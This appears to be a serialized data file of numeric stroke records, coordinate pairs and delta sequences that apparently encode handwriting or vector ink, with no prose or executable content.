0 0,0 0-1,0 0 1,0 0 0,-1 0-1,1 0 1,0 1 0,0-1 0,0 0-1,0 0 1,0 0 0,0 0-1,0 0 1,-1 0 0,1 1-1,0-1 1,0 0 0,0 0-1,0 0 1,0 1 0,6 4 359,-1-3-2304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54 146 308,'0'0'601,"-10"-1"1160,10 2-1371,-17 2 4104,23 0-3637,-9-1-244,-2 1-236,11-2-136,-4-1 249,1 1-377,1-1-1,-1 1 1,0-1 0,1 0-1,-1 0 1,1 0-1,-1 0 1,0-1 0,1 1-1,-1-1 1,0 0-1,1 0 1,-1 0 0,0 0-1,0-1 1,0 1 0,6-4-1,18-9-125,-20 11 12,0 0 1,-1-1-1,1 0 0,-1 0 0,0 0 1,0-1-1,10-9 0,0 5 2,-15 8-1,1 1 1,-1-1-1,1 0 0,-1 1 1,1-1-1,-1 0 1,1 0-1,-1 0 0,0 0 1,0 0-1,1 0 0,-1 0 1,0 0-1,0 0 0,0 0 1,0-1-1,0 1 0,1-3 1,2-2-1,-4 6 1,1-1 0,0 0 0,0 1 0,-1-1 0,1 0 0,-1 1 0,1-1 0,0 0 0,-1 0 0,1 0 0,-1 1 0,0-1 0,1 0-1,-1 0 1,0 0 0,1 0 0,-1 0 0,0 0 0,0 0 0,0 0 0,0 1 0,0-1 0,0 0 0,0 0 0,0 0 0,0 0 0,-1 0 0,1 0 0,0 0-1,-1 0 1,1 0 0,0 1 0,-1-1 0,0-2 0,-1 1 2,1 1-1,-1-1 1,0 0-1,0 0 1,0 1-1,0-1 1,0 1-1,0-1 0,-1 1 1,1 0-1,0 0 1,-1 0-1,-2-1 1,-53-1 194,51 3-152,1 0 35,-1 1 0,1-1 0,0 1 0,0 0 0,-1 1 0,1-1 0,0 1 0,1 0 1,-1 1-1,0 0 0,0 0 0,1 0 0,0 0 0,0 1 0,0 0 0,0 0 0,0 0 0,-7 10 0,9-9-57,0 0 0,0 0 0,0 1-1,1-1 1,0 1 0,0-1 0,1 1 0,-1 0-1,1 0 1,0 10 0,2-4-35,1 0 0,0-1 0,1 0 1,0 0-1,1 0 0,0 0 0,1 0 0,0-1 0,1 0 0,0 0 1,1 0-1,11 13 0,-15-21 23,0 1 1,0-1-1,0 0 1,0 0 0,0 0-1,1-1 1,-1 1-1,1-1 1,-1 0-1,1 0 1,-1 0-1,1 0 1,0-1-1,7 1 1,65-3-1215,-38 0-1719,4-5-2979,-32 2 3446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1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50 988,'3'-9'3934,"5"16"-1365,3 18-1383,-22 62 583,0-45-1327,0-6-123,13-23 352,3-26 748,1-5-1248,-2 9-116,-1 1 0,0-1 0,0 0-1,-1 0 1,3-14 0,5-19-47,-5 28 7,-4 14-13,-1-1 1,1 0-1,0 1 0,-1-1 0,1 0 0,-1 0 0,0 1 0,1-1 0,-1 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,0 1 0,0-1 0,0 0 0,0 0 0,0 0 0,0-2 0,13-20 14,-12 22-16,0-1-1,1 0 1,0 1 0,-1 0-1,1-1 1,0 1-1,-1 0 1,1 0 0,0 0-1,0 0 1,0 0-1,0 1 1,0-1 0,0 0-1,0 1 1,0-1-1,0 1 1,0 0 0,3 0-1,-3 0 3,-1-1 1,1 1-1,-1 0 0,1-1 0,-1 1 0,1-1 0,-1 1 1,0-1-1,1 0 0,-1 0 0,0 0 0,1 0 0,-1 0 1,2-1-1,8-6 17,0 3-15,-6 2-4,-4 2 0,1 0-1,-1 0 1,1 0 0,-1 0-1,1 0 1,-1 0 0,1 1-1,0-1 1,-1 1 0,1-1-1,0 1 1,-1-1 0,1 1 0,0 0-1,0 0 1,-1 0 0,1 0-1,0 0 1,0 0 0,-1 1-1,1-1 1,0 1 0,0-1 0,-1 1-1,1-1 1,2 3 0,-2-2-4,-2-1 5,1-1-1,-1 1 0,1 0 0,-1 0 0,1 0 1,-1 1-1,1-1 0,-1 0 0,1 0 1,-1 0-1,0 0 0,1 0 0,-1 0 1,1 1-1,-1-1 0,1 0 0,-1 0 1,0 1-1,1-1 0,-1 0 0,0 0 1,1 1-1,-1-1 0,0 0 0,1 1 1,-1-1-1,0 1 0,0-1 0,1 0 0,-1 1 1,0-1-1,0 1 0,0-1 0,0 1 1,0-1-1,1 0 0,-1 1 0,0-1 1,0 1-1,0-1 0,0 1 0,0-1 1,0 1-1,-1-1 0,1 1 0,0-1 1,0 1-1,0-1 0,0 0 0,0 1 1,-1-1-1,1 1 0,-9 31 230,7-25-180,-9 41 173,7-41-185,-3 9 152,7-15-21,-9-2 1409,29-20-1324,-17 17-223,0 0-1,0 0 1,1 0 0,-1 1-1,1-1 1,-1 1-1,7-4 1,18-11-60,-21 13 15,0 0 0,0 1-1,0-1 1,1 2 0,14-6-1,-20 8 22,0 1-1,0 0 0,0 0 1,0 0-1,0 0 0,0 0 1,0 0-1,0 0 1,0 1-1,0-1 0,0 1 1,0 0-1,0-1 1,0 1-1,0 0 0,0 0 1,0 0-1,0 0 0,-1 1 1,1-1-1,-1 0 1,1 1-1,-1-1 0,1 1 1,-1-1-1,0 1 0,0 0 1,3 3-1,5 6-9,-8-8 6,1-1 0,-1 1 0,1 0-1,-1 0 1,0 0 0,0 0 0,0 0 0,0 0-1,0 0 1,-1 0 0,1 4 0,7 26 19,-8-32-22,1 0 1,-1 0 0,0-1-1,0 1 1,0 0 0,1 0-1,-1 0 1,0 0 0,0 0-1,-1 0 1,1-1 0,0 1-1,0 0 1,0 0 0,0 0-1,-1 0 1,1 0 0,0-1-1,-1 1 1,1 0 0,-1 0-1,0 0 1,-5 17 2,4-9-45,0 0 1,0 0 0,-1 0 0,0-1-1,-8 15 1,2-10-555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12 448,'0'0'208,"0"-1"1,0 1-1,0-1 1,0 1-1,0-1 1,0 1-1,0-1 1,0 1-1,0 0 1,0-1-1,0 1 0,0-1 1,-1 1-1,1-1 1,0 1-1,0 0 1,0-1-1,-1 1 1,1-1-1,0 1 1,0 0-1,-1-1 0,1 1 1,0 0-1,-1-1 1,1 1-1,0 0 1,-1 0-1,0-1 1,1 1-137,-1 1-1,1-1 1,0 0 0,-1 0 0,1 1 0,0-1 0,-1 0 0,1 1 0,0-1 0,-1 0 0,1 1 0,0-1 0,0 1 0,-1-1 0,1 1 0,0-1-1,0 0 1,0 1 0,0-1 0,0 1 0,-1-1 0,1 1 0,0-1 0,0 1 0,0-1 0,0 1 0,0-1 0,1 1 0,-1-1 0,0 1-1,0 15 395,1-5-239,-1 0 0,-1 0 1,0 0-1,0 0 0,-6 21 0,-4 40 579,4-39-278,6-27-387,0 1 0,0-1 0,-1 0 0,1 0 0,-2 0 0,-2 8 0,-1 6 290,17-11-67,35-11 65,-13 1-497,-28 2 60,-1 0 0,1 1-1,0-1 1,-1 1 0,1 0 0,6 5-1,-10-6 15,1 1-1,-1-1 0,0 1 1,1-1-1,-1 1 1,0-1-1,0 1 0,0 0 1,-1-1-1,1 1 1,0 0-1,-1 0 0,1-1 1,-1 1-1,1 0 1,-1 0-1,0 0 1,0 0-1,0 3 0,-1-1 42,0-1 0,-1 1 0,1-1-1,-1 1 1,0-1 0,0 0 0,0 0 0,0 0-1,-1 0 1,1-1 0,-4 4 0,-9 13 485,11-15-457,1 1 0,0-1 0,-1 0-1,0-1 1,0 1 0,0-1-1,0 1 1,-1-1 0,1-1 0,-1 1-1,1-1 1,-1 1 0,0-1 0,0-1-1,-10 3 1,-2 0-67,1-1 1,-1-1-1,-30 0 0,17-7 90,7 2-686,10 6-2686,8 1 2399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85 128 1056,'0'-2'212,"1"0"-1,-1 1 1,1-1-1,-1 1 1,1-1-1,0 0 0,-1 1 1,1-1-1,0 1 1,0 0-1,0-1 1,0 1-1,0 0 1,1-1-1,-1 1 1,0 0-1,2-1 1,-1 1-171,-1 0 1,0 0-1,0 0 1,0 0-1,0 0 1,0 0-1,0 0 1,0 0-1,0-1 1,0 1-1,-1 0 1,1-1-1,0 1 1,-1 0-1,1-1 1,-1-2 0,2-1 64,1 0 0,-1 0 0,0 0 0,1 0 0,0 0 0,0 1 0,1 0 0,-1-1 1,1 1-1,0 0 0,5-3 0,-9 6-69,0 1 1,1 0-1,-1-1 1,0 1-1,1-1 1,-1 1-1,0-1 1,0 1-1,0-1 1,1 1-1,-1 0 1,0-1-1,0 1 1,0-1-1,0 1 1,0-1-1,0 1 1,0-1-1,0 1 0,0-1 1,0 1-1,0-1 1,0 1-1,0-1 1,-1 1-1,1-1 1,0 1-1,0-1 1,-1 1-1,1-1 1,0 1-1,0 0 1,-1-1-1,1 1 1,0-1-1,-1 1 1,1 0-1,-1 0 1,1-1-1,0 1 1,-1 0-1,1-1 0,-1 1 1,1 0-1,-1 0 1,1 0-1,-1 0 1,1-1-1,-1 1 1,1 0-1,-1 0 1,1 0-1,-1 0 1,1 0-1,-1 0 1,0 1-1,-5-1 177,-1 1 0,1 0 0,0 0 0,0 1 0,-1 0 0,1 0-1,0 0 1,1 1 0,-1 0 0,0 0 0,1 1 0,0-1 0,0 1 0,0 0 0,0 0-1,0 1 1,1 0 0,0 0 0,0 0 0,-6 9 0,2-4-13,7-10-184,0 1 0,0 0 0,0 0 0,1-1 1,-1 1-1,0 0 0,0 0 0,1 0 1,-1 0-1,1 0 0,-1 0 0,1 0 0,-1 0 1,1 0-1,0 0 0,-1 0 0,1 3 1,-6 16 189,6-20-203,-1 1 0,1-1 1,-1 1-1,1 0 1,0-1-1,0 1 1,-1 0-1,1-1 1,0 1-1,0 0 1,0-1-1,0 1 1,0 0-1,0 0 1,0-1-1,0 1 1,0 0-1,0-1 1,0 1-1,0 0 1,0-1-1,1 1 0,-1 0 1,0-1-1,1 1 1,-1 0-1,0-1 1,1 1-1,-1-1 1,0 1-1,1-1 1,-1 1-1,1-1 1,-1 1-1,2 0 1,6 12 96,-8-12-97,1 0 1,-1 1 0,1-1 0,0 0 0,-1 0 0,1 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,2 0 0,5 4-246,10 5 402,0 0 1,26 8-1,-3-9-2662,3-13-5709,-34-1 5441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1420,'0'0'2310,"11"6"-374,-10-4-1855,-1-1 0,1 1 0,0 0 0,0-1 0,0 1 1,0-1-1,0 0 0,0 1 0,0-1 0,1 0 0,-1 0 0,0 1 0,1-1 0,-1 0 1,1 0-1,-1-1 0,1 1 0,2 1 0,36 14 227,-35-15-256,1 0 0,-1-1 0,1 0 0,-1 0-1,1 0 1,-1-1 0,1 0 0,-1 0 0,1 0 0,-1-1-1,0 1 1,1-1 0,-1-1 0,0 1 0,6-5-1,8-5 434,0 0 0,23-21-1,-41 32-398,1 0 0,-1 0 0,0 0 0,0 0-1,0-1 1,0 1 0,1 0 0,-2 0 0,1-1-1,0 1 1,0 0 0,0-1 0,-1 1 0,1-1 0,-1 1-1,1-1 1,-1 0 0,1 1 0,-1-1 0,0 1 0,0-1-1,0 0 1,0 1 0,0-1 0,0 1 0,0-1 0,-1 0-1,1 1 1,0-1 0,-1 1 0,0-1 0,0-2-1,-4-7 576,5 10-647,0 1-1,0-1 1,0 0 0,0 1 0,0-1 0,0 1 0,0-1-1,-1 1 1,1-1 0,0 1 0,0-1 0,0 1 0,-1-1 0,1 1-1,0-1 1,-1 1 0,1-1 0,0 1 0,-1 0 0,1-1 0,-1 1-1,1-1 1,-1 1 0,1 0 0,-1 0 0,0-1 0,-6-3 160,-1-1-47,1 1-1,-1 0 1,0 1 0,-13-5-1,17 8-115,1-1 0,-1 1 0,1-1 0,0 1-1,-1 0 1,1 0 0,-1 1 0,1-1 0,-1 1-1,1 0 1,0 0 0,-1 0 0,1 0 0,0 0 0,-6 4-1,-10 5 10,13-7-22,1-1 0,-1 1-1,1 0 1,0 0-1,0 0 1,0 0-1,1 1 1,-1 0-1,1 0 1,0 1 0,0-1-1,0 1 1,0 0-1,1 0 1,0 0-1,-4 10 1,5-11-18,-1 4-62,0-1-1,1 1 0,0 0 1,0 0-1,0 12 1,2-19-17,0 1 1,0-1-1,0 0 1,0 0-1,0 1 1,0-1-1,1 0 1,-1 0 0,0 0-1,1 0 1,-1 1-1,1-1 1,0 0-1,-1 0 1,1 0-1,0 0 1,-1 0-1,1 0 1,0 0 0,0-1-1,0 1 1,0 0-1,0 0 1,0-1-1,0 1 1,0 0-1,0-1 1,0 1-1,0-1 1,0 0 0,1 1-1,-1-1 1,0 0-1,0 0 1,0 1-1,1-1 1,-1 0-1,0 0 1,0 0-1,0-1 1,1 1 0,-1 0-1,0 0 1,0-1-1,0 1 1,1 0-1,0-1 1,11-3-547,0 0 0,0 0 0,0-1 0,0-1 0,-1 0 0,0-1 0,0 0 0,-1-1 0,1 0 0,12-13 0,-6 4 280,0-1 1,-2-1 0,0-1 0,25-40 0,-36 51 654,-1-1-1,0 0 1,0 0 0,-1 0 0,0-1 0,0 1 0,-1-1 0,0-17 0,0-50 4264,-2 53 886,11 50-3851,-1 8-1136,-8-29-430,0 0 1,-1 0-1,1 0 0,-1 1 0,0-1 1,1 9-1,0-3-18,0 0-1,0-1 1,1 1 0,0-1 0,0 1 0,9 15 0,-5-10-37,-3-7 40,19 39-2551,-19-40 906,0-1 0,1 0 0,-1-1 0,1 1 0,9 7 0,-3-2-1091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65 252,'-1'5'7183,"0"-4"-7145,0 0 0,0 0 0,0-1 0,0 1 0,0 0 0,1 0 0,-1 0 0,0 1 0,1-1 0,-1 0 0,1 0 0,-1 0 0,1 0 0,0 0 0,-1 1 0,1-1 0,0 0 0,0 0 0,0 1 0,0 0 0,1 38 412,0-33-368,0 0 0,-1 0-1,0 0 1,0 1 0,-1-1 0,-1 9 0,-16 91 667,12-62-788,9-29 448,-2-15-361,-1-1 0,0 0 0,1 0 0,-1 0 0,0 0-1,0 0 1,1 0 0,-1 0 0,0 0 0,1 0 0,-1 0-1,0 0 1,1 0 0,-1 0 0,0 0 0,0 0 0,1 0-1,-1-1 1,0 1 0,0 0 0,1 0 0,-1 0 0,0 0-1,0-1 1,1 1 0,-1 0 0,0 0 0,0 0-1,1-1 1,-1 1 0,0 0 0,0 0 0,0-1 0,0 1-1,0 0 1,1 0 0,-1-1 0,0 1 0,0 0 0,0-1-1,0 1 1,0 0 0,0 0 0,0-1 0,14-53 861,-3 25-840,1 1 1,17-31-1,4-6-48,-29 56 10,2 0-1,-1 1 1,1 0-1,0 1 1,0-1 0,12-9-1,6-8 35,-21 22-60,1 0-1,-1 0 1,0 1-1,1-1 1,0 1-1,0 0 1,-1 0-1,1 1 1,0-1 0,1 1-1,-1 0 1,0 0-1,0 0 1,7 0-1,-10 1-3,1-1 0,0 1 0,-1 0 0,1 0 0,0 0 0,-1 1 0,1-1 0,-1 0 0,1 1 0,0-1 0,-1 1 0,1-1 1,-1 1-1,1 0 0,-1-1 0,1 1 0,-1 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,0 1 0,0-1 0,0 0 0,0 0 0,0 1 0,0-1 0,0 1 0,0-1 0,-1 1 0,1-1 0,-1 1 0,1-1 0,-1 1 0,1 0 0,-1-1 0,0 1 0,0-1 0,0 1 0,0 2 0,0 0-8,1 1-1,-1 0 0,0-1 0,-1 1 1,1-1-1,-1 1 0,0-1 0,0 1 1,0-1-1,-1 1 0,0-1 0,1 0 1,-1 0-1,-1 0 0,1 0 1,-1 0-1,1 0 0,-1-1 0,-5 6 1,-19 20 178,-34 30 1,51-51-642,0 1 0,-1-2 1,0 0-1,0 0 0,0-1 1,-1 0-1,-18 6 0,21-11-505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51 115 1148,'-12'6'2140,"11"-5"-2055,0-1 0,0 0 0,0 1 0,0-1 0,0 1 0,0 0 0,0-1 0,0 1 0,0-1 0,0 1 0,0 0 0,0 0 0,0 0 0,1 0 0,-1-1 0,0 1 0,1 0 0,-1 0 0,1 0 0,-1 0 0,1 1 0,-1-1 0,1 0 0,-1 0 0,1 0 0,0 0 0,0 0 0,0 0 0,0 1 0,0-1 0,0 0 0,0 2 0,23 38 1291,-19-39-1240,0 0 0,0 0-1,0 0 1,0-1 0,0 0-1,0 0 1,0 0 0,0 0-1,0-1 1,0 1 0,1-1-1,-1 0 1,0 0 0,0-1-1,1 1 1,-1-1 0,0 0-1,5-2 1,15-8 676,-19 9-594,-1 0 0,0 1 0,-1-2 0,1 1 0,0 0 0,0-1 0,-1 1 0,7-7 0,11-20 1006,-20 26-1108,0 0 0,0 0 0,-1 0 0,0 0 0,1 0 0,-1-1 0,0 1 0,0 0 0,-1 0 0,0-3 0,1-1 226,0 5-278,0 0 0,0-1-1,-1 1 1,1 0 0,-1 0 0,1 0 0,-1 0 0,0-1 0,1 1-1,-1 0 1,0 0 0,-1 0 0,1 1 0,0-1 0,0 0 0,-1 0 0,1 1-1,-1-1 1,-2-1 0,-21-30 526,16 27-463,-11-5 38,19 11-150,-1 0-3,-7 0-6,6 0-9,0 1 0,0-1 0,0 1 0,0-1 0,0 1 0,0 0 0,0 0 0,0 0 0,0 1 0,1-1 0,-1 1 0,0-1 0,1 1-1,0 0 1,-1 0 0,1 0 0,0 0 0,0 1 0,0-1 0,0 1 0,0-1 0,1 1 0,-3 4 0,-10 11-41,8-13 28,3-3 9,0 0 1,1 0 0,-1 0 0,0 0 0,1 1-1,0-1 1,-1 1 0,1-1 0,0 1 0,0 0-1,1 0 1,-1 0 0,0 0 0,1 0 0,0 0-1,-2 6 1,-1 13-75,3-21 52,1 0 1,-1 0 0,1 1 0,-1-1-1,1 0 1,0 1 0,0-1 0,0 0-1,-1 1 1,1-1 0,1 0 0,-1 1-1,0-1 1,0 0 0,0 1 0,1-1 0,-1 0-1,1 1 1,-1-1 0,1 0 0,-1 0-1,1 1 1,0 0 0,9 18-2284,-10-19 2002,0 0 1,1 0-1,-1 1 0,1-1 1,-1 0-1,1 0 1,-1 0-1,1 0 0,0 1 1,-1-1-1,1 0 0,0 0 1,0-1-1,0 1 1,0 0-1,0 0 0,0 0 1,0-1-1,0 1 1,0 0-1,1-1 0,-1 1 1,0-1-1,0 1 0,0-1 1,1 0-1,-1 1 1,0-1-1,1 0 0,-1 0 1,0 0-1,0 0 1,1 0-1,1-1 0,8 1-2286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19 1436,'0'-3'691,"1"-10"4096,-1 13-4742,0 0 0,1 0 0,-1 0 0,0 0 1,0-1-1,0 1 0,0 0 0,0 0 0,0 0 0,0 0 0,1-1 0,-1 1 0,0 0 0,0 0 1,0 0-1,0 0 0,1 0 0,-1 0 0,0-1 0,0 1 0,0 0 0,0 0 0,1 0 0,-1 0 1,0 0-1,0 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,0 0 0,0 0 0,1 0 0,-1 0 1,0 0-1,0 0 0,0 0 0,1 0 0,-1 1 0,0-1 0,0 0 0,0 0 0,0 0 0,1 0 1,-1 0-1,0 0 0,0 1 0,1 3 154,0 0 1,0 0-1,-1 1 1,1-1-1,-1 1 1,0-1-1,0 0 1,-1 6-1,0 0 111,-10 63 194,11-64-495,0-7-15,-1 0 0,1-1 0,0 1 0,0 0 0,0 0 0,0-1 0,0 1 0,0 0 0,0 0 0,1-1 0,-1 1-1,1 0 1,-1-1 0,1 1 0,0-1 0,-1 1 0,1 0 0,0-1 0,0 1 0,2 1 0,6 5-824,4-2-1667,-1-13-3982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0 972,'0'2'5576,"0"2"-4395,2 3-975,1 0 0,-1-1-1,1 1 1,1-1 0,6 10 0,0-3-87,-8-10-127,0 0 0,1 0 0,-1 0 0,1 0 0,0 0-1,0-1 1,0 1 0,0-1 0,4 2 0,-4-2-111,0 0-1,1-1 1,-1 1-1,0-1 1,1 0-1,-1 0 1,1 0 0,6 0-1,-6-1-249,0 0-1,-1-1 1,1 0-1,0 1 1,0-1-1,-1 0 1,1-1 0,-1 1-1,1-1 1,-1 1-1,1-1 1,-1 0-1,0 0 1,0-1 0,4-3-1,4-5-1030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7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1 1128,'0'0'1194,"-32"19"3223,-31 53-1330,9 0-1019,32-42-1516,19-25-493,-1 0 0,1 0 1,-1 0-1,-1 0 0,-8 7 0,12-11-47,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,0 1 0,1-1 0,-1 0 0,1 0 0,-1 1 0,1 1 0,-11 14 90,9-14-106,0-1 0,0 1 0,0-1 0,0 1 0,0-1 0,1 1 0,-1 0 1,1 0-1,-1 4 0,-11 16-573,11-10-1232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1 504,'-43'25'7249,"27"-11"-6550,1 2-1,1-1 1,0 2 0,1 0 0,1 0 0,1 1 0,0 1 0,1 0-1,-12 34 1,11-3 245,10-46-907,0 0 0,1 0-1,-1 0 1,1 1 0,0-1 0,0 0 0,1 1 0,-1-1 0,1 0-1,0 0 1,2 8 0,3 19 87,-5-28-125,-1 0 0,1-1 0,0 1 0,0-1 0,1 1 0,-1-1-1,0 1 1,1-1 0,-1 0 0,1 0 0,0 1 0,0-1 0,0-1-1,4 4 1,32 23-1004,-28-20-941,-3-4-763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08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86 796,'-1'1'60,"1"-1"1,-1 0-1,0 0 0,1 1 0,-1-1 1,0 1-1,1-1 0,-1 0 1,1 1-1,-1-1 0,1 1 0,-1-1 1,1 1-1,0 0 0,-1-1 0,1 1 1,-1-1-1,1 1 0,0 0 1,0-1-1,-1 1 0,1 0 0,0-1 1,0 1-1,0 0 0,0 0 0,0-1 1,0 1-1,0 0 0,0-1 1,0 1-1,0 0 0,0-1 0,0 1 1,0 0-1,1 0 0,-1-1 1,0 1-1,0-1 0,1 1 0,-1 0 1,1-1-1,-1 1 0,0-1 0,1 1 1,0 0-1,5 15 654,-6-14-660,1 1 0,0-1 0,0 0-1,0 0 1,0 1 0,0-1 0,0 0 0,1 0-1,-1 0 1,1 0 0,-1 0 0,1 0 0,0 0-1,-1-1 1,1 1 0,0-1 0,0 1 0,0-1 0,1 0-1,-1 0 1,0 0 0,0 0 0,1 0 0,-1 0-1,0-1 1,1 1 0,4 0 0,-3 0-10,0 0 0,0 0 0,0-1 0,0 0 0,0 1 0,0-1 0,0 0 0,0-1 0,1 1 0,-1-1 0,0 0-1,0 0 1,0 0 0,0-1 0,-1 1 0,1-1 0,5-3 0,26-19 262,8-6 539,-41 27-758,0 1 0,0 0 0,-1 0 1,1-1-1,-1 1 0,1-1 0,-1 1 0,0-1 0,0 1 1,0-1-1,0 0 0,0 0 0,-1 1 0,1-1 0,-1 0 0,0-4 1,0 4 12,-1 0 0,0 1 0,1-1 1,-1 0-1,-1 0 0,1 1 0,0-1 1,-1 1-1,1-1 0,-1 1 0,0-1 1,1 1-1,-1 0 0,0 0 0,-1 0 1,1 0-1,0 0 0,0 1 0,-1-1 1,1 1-1,-1-1 0,0 1 0,1 0 1,-6-2-1,5 2-69,-1 0 1,1 0-1,0 0 0,-1 0 1,1 0-1,-1 1 1,1-1-1,-1 1 0,0 0 1,1 0-1,-1 1 1,1-1-1,-1 1 0,1-1 1,-1 1-1,1 0 1,0 0-1,-1 1 0,1-1 1,0 1-1,-5 3 0,-23 15-4,26-17-61,0 0 0,1-1 0,-1 2 0,1-1 0,-1 0 0,1 1 0,0 0 0,-6 8 0,-19 26-6839,27-32 4167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60 516,'-10'7'6786,"9"5"-5895,1-11-829,-1 1 1,1 0-1,0 0 1,0 0-1,0 0 1,0 0-1,0 0 1,0-1-1,0 1 1,0 0 0,1 0-1,-1 0 1,1 0-1,0-1 1,-1 1-1,1 0 1,0 0-1,0-1 1,0 1-1,0-1 1,2 2-1,8 4 316,-5-2-287,1-1 1,-1-1-1,1 1 1,0-1-1,0 0 1,0-1 0,0 0-1,14 3 1,-18-2-93,-3-3 3,0 0-1,0 0 0,0 1 1,1-1-1,-1 0 1,0 0-1,0 1 0,0-1 1,0 0-1,1 0 1,-1 0-1,0 1 0,0-1 1,1 0-1,-1 0 0,0 0 1,0 0-1,1 1 1,-1-1-1,0 0 0,1 0 1,-1 0-1,0 0 1,0 0-1,1 0 0,-1 0 1,0 0-1,1 0 1,-1 0-1,0 0 0,0 0 1,1 0-1,-1 0 0,0 0 1,1 0-1,-1 0 1,0-1-1,0 1 0,1 0 1,-1 0-1,0 0 1,0 0-1,1-1 0,-1 1 1,4-2 9,-2 2 83,0-1 0,0 1 0,0-1 0,0 0-1,-1 0 1,1 0 0,0 0 0,0 0 0,-1 0 0,1 0 0,0-1-1,-1 1 1,3-3 0,-1-2 29,-2 5-117,-1 1 0,1-1 0,0 0 0,-1 0 0,1 1 0,-1-1-1,1 0 1,-1 0 0,1 0 0,-1 0 0,0 0 0,1 0 0,-1 0 0,0 0-1,0 1 1,0-1 0,0 0 0,0-2 0,1-11 7,-1 11-8,1 1 0,-1 0 0,1-1 0,-1 1 0,0 0 0,0-1-1,0 1 1,-1 0 0,1-1 0,-1 1 0,1 0 0,-1-1 0,0 1 0,1 0 0,-1 0 0,0 0 0,-1 0 0,-1-4-1,1 5 48,1 0 0,0-1 0,0 1 0,0 0 0,0 0 0,0-1 0,1 1 0,-1 0 0,0-1-1,0 1 1,1-1 0,-1 1 0,1-1 0,0 0 0,-1 1 0,1-1 0,0 1 0,0-2 0,-32-17 1694,-3 9-1508,30 14-282,0 1 0,0-1 0,0 1 0,0 0 0,1 0 1,-1 1-1,1-1 0,0 1 0,0 0 0,1 0 0,-1 1 1,1-1-1,0 0 0,1 1 0,-1 0 0,1 0 0,0 0 0,1 0 1,-1 0-1,1 0 0,0 11 0,-4-3-823,1-8-1130,2 4-5413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47 236,'24'-30'6410,"-23"29"-6189,-1-1 0,1 1 0,0 0 0,0 0 0,0 0 0,0 0 1,0 0-1,0 0 0,0 0 0,0 1 0,1-1 0,-1 0 0,0 1 0,0-1 0,1 0 0,-1 1 0,0 0 1,1-1-1,-1 1 0,1 0 0,1-1 0,-2 2-115,-1 0 0,1 0 0,-1 0 0,0 0 0,0 0 0,1 0 1,-1 0-1,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,-1 0 0,1 0 1,0 0-1,-1 0 0,1 0 0,-1 0 0,1 0 0,-1 0 0,1 0 0,-1 0 0,1 0 0,-1-1 0,0 1 1,-1 1-1,2 0-83,-1 0 0,1 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,0 0-1,1 0 1,-1 0 0,0 0 0,0 0 0,1 0 0,0 0 0,-1 0 0,1-1 0,1 3 0,3 21 77,-4-18-213,-1 0 1,1-1-1,0 1 0,1 0 0,-1 0 0,1 0 0,1-1 0,-1 1 0,1-1 0,0 1 0,1-1 0,-1 0 0,1 0 0,1-1 0,-1 1 0,1-1 0,7 7 1,-11-12-9,-1 0 1,1 1 0,0-1-1,-1 0 1,1 0 0,-1 0 0,1 1-1,0-1 1,-1 0 0,1 0 0,0 0-1,0 0 1,-1 0 0,1 0-1,0-1 1,-1 1 0,1 0 0,-1 0-1,1 0 1,0-1 0,-1 1-1,2-1 1,13-9-8712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93 532,'8'32'6081,"13"-4"-4366,-14-20-1605,1-1 0,0-1 0,1 1 0,14 7 0,-21-13-99,0 0 0,0 0 0,0 0 0,0-1 0,0 1 0,0-1 0,0 0 0,0 1 0,0-1 0,0 0 0,0 0 0,0 0 0,0-1 0,1 1 0,-1 0 0,0-1 0,0 0 0,0 1 0,3-2 0,29-21 35,-32 22-41,1-1 1,-1 0-1,0 0 0,1 0 0,-1-1 1,0 1-1,0 0 0,-1-1 0,1 0 1,0 1-1,-1-1 0,1 0 0,-1 1 0,0-1 1,0 0-1,0 0 0,-1 0 0,1 0 1,0-4-1,4-9 222,-5 15-213,0 1-1,1 0 1,-1-1 0,0 1 0,0-1 0,0 1 0,1 0-1,-1-1 1,0 1 0,0-1 0,0 1 0,0 0 0,0-1-1,0 1 1,0-1 0,0 1 0,0-1 0,0 1-1,0 0 1,0-1 0,0 1 0,0-1 0,0 1 0,-1 0-1,1-1 1,0 1 0,0-1 0,0 1 0,-1 0 0,1-1-1,0 1 1,0 0 0,-1-1 0,1 1 0,0 0 0,-1-1-1,1 1 1,0 0 0,-1-1 0,-10-30 1049,8 27-970,0-1 0,0 1 0,-1 0 0,1 0 1,-1 1-1,0-1 0,0 1 0,0 0 0,0 0 1,-1 0-1,1 0 0,-1 1 0,0 0 0,0 0 0,0 0 1,-7-1-1,8 2-92,1 1 0,0 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,0 1 0,-1-1 0,1 1 0,0 0 0,0 0 0,0 0 0,0 1 0,0-1 0,0 1 0,0 0 0,1-1 0,-1 1 0,1 1 0,-1-1 0,1 0 0,0 0 0,-1 1 0,1-1 0,0 1 0,1 0 0,-1 0 0,0 0 0,1-1 0,0 1 0,0 1 0,0-1 0,-2 5 0,3-3-60,-1-1-1,0 1 1,0-1 0,-1 1-1,1-1 1,-1 0 0,-3 7-1,-5 10-964,7-9 391,2-9 287,1-1-1,0 1 1,-1-1 0,0 0 0,0 1 0,0-1 0,0 0 0,0 1 0,0-1-1,0 0 1,-1 0 0,1 0 0,-4 3 0,-4 2-1830,8 4-132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1860,'0'-1'70,"0"1"-1,0 0 1,0 0-1,0 0 1,-1 0-1,1-1 1,0 1-1,0 0 1,0 0-1,0 0 1,0 0-1,0-1 1,0 1-1,0 0 1,0 0-1,0 0 1,1-1-1,-1 1 1,0 0-1,0 0 1,0 0-1,0 0 1,0-1-1,0 1 1,0 0-1,0 0 1,0 0-1,1 0 1,-1 0-1,0 0 1,0-1-1,0 1 1,0 0-1,0 0 1,1 0-1,-1 0 1,0 0-1,0 0 1,0 0-1,0 0 1,1 0-1,-1 0 1,0 0-1,0 0 1,0 0-1,0 0 1,1 0-1,-1 0 1,0 0 0,0 0-1,0 0 1,0 0-1,1 0 1,-1 0-1,0 0 1,6 12 4769,-7 12-3257,1-8-875,0 0 0,0 0-1,2 0 1,6 29-1,2 35 394,-3-51-929,-6-19-138,1 0 0,0 0 0,1-1 0,0 1 0,1-1 0,9 17 0,4 7 3,-16-30-24,0 1 0,1 0 0,0 0 0,0-1 0,0 1 0,0-1 0,1 0 